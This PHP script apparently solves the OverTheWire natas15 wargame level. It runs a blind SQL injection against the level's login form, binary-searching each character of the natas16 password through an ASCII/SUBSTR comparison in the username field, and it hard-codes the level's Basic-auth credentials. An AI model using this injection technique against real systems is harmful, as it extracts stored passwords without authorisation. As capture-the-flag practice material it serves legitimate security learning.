- <?php
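/**
 * POSTs $post_data to the natas15 login form and returns the response body.
 *
 * The target URL and the natas15 level credentials are fixed here because this
 * script only ever talks to that one level. Note that the request goes over
 * plain HTTP with HTTP Basic auth (curl's default scheme), so the level
 * password travels in cleartext on the wire.
 *
 * @param array $post_data Associative array of POST parameters (form-encoded)
 * @throws Exception When curl cannot be initialised, the transfer fails, or the
 *         server does not answer with HTTP 200
 * @return string Response body from the server
 */
function get_server_response(array $post_data) {
    $ch = curl_init();
    if ($ch === false) {
        throw new Exception("curl_init failed.");
    }
    curl_setopt($ch, CURLOPT_URL, "http://natas15.natas.labs.overthewire.org");
    //curl_setopt($ch, CURLOPT_URL, "http://localhost/PHPStorm_Workshop/natas/natas15_test.php"); // Debug
    curl_setopt($ch, CURLOPT_USERPWD, "natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));

    $response = curl_exec($ch);
    $error = curl_error($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch); // release the handle before any throw so it is never leaked

    if ($response === false) {
        throw new Exception("curl failed: " . $error);
    }
    // A non-200 answer (401 on a wrong level password, 5xx, ...) never contains
    // "This user exists." and would otherwise be read by the caller as a
    // perfectly valid "false" oracle answer.
    if ($http_code !== 200) {
        throw new Exception("unexpected HTTP status " . $http_code);
    }
    return $response;
}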
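/**
 * <p>
 * Generates the payload that tests whether ``$test_char`` is GREATER THAN the
 * password character at ``$search_index`` (0-based).<br>
 * Comparison is done on ASCII values, which keeps it case-sensitive even when
 * the column's collation is not.
 * </p>
 *
 * <p>The injected username makes the server run (everything after "--" is commented out):</p>
 * ```
 * SELECT * FROM users WHERE username="natas16" AND ASCII("{$test_char}") > ASCII(SUBSTR(users.password, {$search_index}+1, 1)) -- ...rest of the original query
 * ```
 *
 * @param string $test_char Single alphanumeric test character
 * @param int $search_index 0-based index of the password character to compare against
 * @return array Associative array payload (POST parameters)
 * @throws InvalidArgumentException When $test_char is not exactly one alphanumeric
 *         character (a quote or backslash would break the injected query) or
 *         when $search_index is negative
 */
function generate_exploit_payload(string $test_char, int $search_index) {
    if (preg_match('/^[0-9A-Za-z]$/', $test_char) !== 1) {
        throw new InvalidArgumentException("test_char must be a single alphanumeric character");
    }
    if ($search_index < 0) {
        throw new InvalidArgumentException("search_index must be >= 0");
    }
    // MySQL SUBSTR positions start at 1; callers work with 0-based indices.
    $mysql_position = $search_index + 1;
    $exploit_code = "ASCII(\"{$test_char}\") > ASCII(SUBSTR(users.password, {$mysql_position}, 1))";
    return array(
        "username" => "natas16\" AND $exploit_code -- Comment"
    );
}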
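/**
 * Asks the server whether ``$char`` is GREATER THAN the password character at
 * ``$index`` (0-based), by ASCII value. The oracle is the string
 * "This user exists." in the response: it is present only when the injected
 * condition evaluated to true.
 *
 * @param string $char Single alphanumeric character to test
 * @param int $index 0-based index of the password character
 * @return bool True when $char is greater than the password character at $index
 * @throws RuntimeException When the request fails. The failure is deliberately
 *         NOT swallowed: a missing response is indistinguishable from a
 *         "false" oracle answer and would silently corrupt the recovered password.
 */
function execute_exploit(string $char, int $index) {
    $payload = generate_exploit_payload($char, $index);
    try {
        $response = get_server_response($payload);
    } catch (Exception $e) {
        throw new RuntimeException(
            "Request for index {$index} / char '{$char}' failed: " . $e->getMessage(),
            0,
            $e
        );
    }
    return (strpos($response, "This user exists.") !== false);
}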
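// Candidate alphabet in ascending ASCII order; the binary search below relies on
// that ordering. A password character outside this set cannot be recovered
// (the search would settle on the largest alphabet character below it).
$possible_letters = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
$password_length = 32; // natas level passwords are 32 characters; adjust for another target
$password = "";
for ($password_index = 0; $password_index < $password_length; $password_index++) {
    // Find the largest alphabet index whose character is NOT greater than the
    // password character; when the character is in the alphabet that is the
    // character itself. Invariant: $possible_letters[$min_index] is not greater
    // than the target, every character above $max_index is greater.
    $min_index = 0;
    $max_index = strlen($possible_letters) - 1;
    while ($min_index < $max_index) {
        // Round the midpoint up so $min_index always advances; rounding down
        // could never select the last alphabet character ('z').
        $test_index = intdiv($min_index + $max_index + 1, 2);
        if (execute_exploit($possible_letters[$test_index], $password_index)) {
            // Test character is greater than the target: the answer lies below it.
            $max_index = $test_index - 1;
        } else {
            $min_index = $test_index;
        }
    }
    $password .= $possible_letters[$min_index];
}
echo $password;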